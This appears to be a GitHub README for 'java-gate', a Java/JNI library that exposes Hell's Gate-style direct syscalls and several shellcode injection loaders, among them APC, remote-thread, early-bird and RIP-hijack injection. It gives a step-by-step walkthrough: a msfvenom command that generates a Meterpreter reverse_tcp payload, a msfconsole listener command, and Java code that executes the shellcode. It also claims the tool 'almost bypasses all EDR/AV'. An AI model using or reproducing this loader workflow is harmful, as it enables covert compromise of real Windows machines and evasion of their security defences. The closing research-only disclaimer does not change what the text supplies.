- Notifications
You must be signed in to change notification settings - Fork20
Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders
License
4ra1n/java-gate
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
Thejava-gate project allows for the implementation of various techniques related to "Hell's Gate" using simple Java code, which involves direct system calls.
byte[]shellcode =newbyte[] {(byte)0xfc, (byte)0x48, ...};HellsGategate =newHellsGate(shellcode);gate.exec();
It supports multiple techniques evolved from "Hell's Gate," such as "Halo's Gate," "Recycled Gate," "Tartarus Gate," and so on. In addition to system call-related functions, it provides many common Shellcode injection techniques, such as APC injection and remote thread injection, and is compiled and built using C and NASM/MASM assembly language. Finally, it calls these techniques at the Java layer through JNI. Various low-level techniques can be achieved through simple Java code.
Why named "java-gate": This project mainly integrates various techniques related to direct system calls, such as Hell's Gate and Halo's Gate. Therefore, it is named "Java Gate," which can also be understood as a gateway between Java and the underlying system.
Note:
- This project only supports 64-bit Windows and 64-bit JVM (as per JNI's requirement that a 64-bit JVM can only load 64-bit DLLs).
- It is recommended to use 64-bit shellcode (e.g., windows/x64/meterpreter/reverse_tcp).
- Loading shellcode in any way may potentially cause JVM crashes (e.g., if the shellcode does not restore the context).
- Only tested in JDK 8, other versions of JDK may not be stable.
(1) Add thejitpack repository to yourMaven configuration:
<repositories> <repository> <id>jitpack.io</id> <url>https://jitpack.io</url> </repository></repositories>
(2) Import the project:
<dependency> <groupId>com.github.4ra1n</groupId> <artifactId>java-gate</artifactId> <version>0.0.2</version></dependency>
(3) Obtain the shellcode
Here, we'll usemeterpreter as an example.
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=YOUR-PORT -f java
(4) Start themsfconsole listener
Here, we'll usemeterpreter as an example.
msfconsole -x"use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT YOUR-PORT;run;"(5) Write a test program
packageme.n1ar4;importme.n1ar4.gate.core.HellsGate;publicclassMain {publicstaticvoidmain(String[]args) {bytebuf[] =newbyte[] { (byte)0xfc, (byte)0x48, ... };HellsGategate =newHellsGate(buf);gate.exec(); }}
(6) Go online
Themsfconsole connection is successfully established.
The system call modules are as follows. Usage is similar to the previous examples, just change the class name.
| Module | Class | Description | Optional |
|---|---|---|---|
| hells-gate | me.n1ar4.gate.core.HellsGate | Hells Gate | / |
| halos-gate | me.n1ar4.gate.core.HalosGate | Halos Gate | / |
| recycled-gate | me.n1ar4.gate.core.RecycledGate | Recycled Gate | / |
| ssn-syscall | me.n1ar4.gate.core.SSNSyscall | SSN Syscall | / |
| tartarus-gate | me.n1ar4.gate.core.TartarusGate | Tartarus Gate | / |
The loader modules are as follows. Usage is similar to the previous examples, just change the class name.
| Module | Class | Description | Optional |
|---|---|---|---|
| apc1 | me.n1ar4.gate.loader.APC1Loader | APC injection using NtTestAlert | / |
| apc2 | me.n1ar4.gate.loader.APC2Loader | Simple thread-based APC injection | / |
| crt | me.n1ar4.gate.loader.CRTLoader | Simple remote thread injection | Process name |
| divide | me.n1ar4.gate.loader.DivideLoader | Create process and inject into it | / |
| early-bird | me.n1ar4.gate.loader.EarlyBirdLoader | Create new process and APC inject | / |
| etwp | me.n1ar4.gate.loader.EtwpLoader | EtwpCreateEtwThread-based injection | / |
| rip | me.n1ar4.gate.loader.RIPLoader | Modify thread context RIP register and execute shellcode | / |
Here is an example of how to use the command-line tool.
java -jar java-gate.jar [module] [shellcode-hex-string] [optional]
Since the JVM may crash, there is a way to create a new process and execute the code.
java -jar java-gate.jar run-new-jvm [module] [shellcode-hex-string]
This is also an approach, and if you want to run this project in your custom code, you can refer to the codeJavaGate#runNewJVM.
There are pre-packaged versions available in the "Release" section, but if you are not confident or need to add your own features, you can manually build it by following these steps:
Please note that this project only supports Windows 64-bit and JVM 64-bit environments, so it can only be compiled and built in that environment.
(1) MSVC x64
TheCMake Toolchains use theMSVC x64 tool, and most of the assembly is based on theml64 compiler fromMSVC.
(2) CMake 3.x
TheC and assembly code is compiled and built usingCMake to generate the correspondingDLL file forJNI. It is recommended to use CLion.
(3) NASM
Most of the assembly is compiled usingMASM, but some assembly is compiled usingNASM, which needs to be downloaded and configured separately in thePATH.
(4) JDK 8 & Maven
TheJava part of the code is built usingJava 8 andMaven. It is recommended to use IDEA.
(5) Python 3.x
This project usesPython for some auxiliary tools, which is not actually a necessary option.
Almost Bypass all EDR/AV
Many thanks to the following excellent projects for providing code (most of the code in this project is based on these):
- https://github.com/am0nsec/HellsGate
- https://github.com/boku7/AsmHalosGate
- https://github.com/thefLink/RecycledGate
- https://github.com/trickster0/TartarusGate
- https://github.com/janoglezcampos/c_syscalls
This tool is intended for cybersecurity research and educational purposes only. It should not be used for any illegal activities.
About
Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders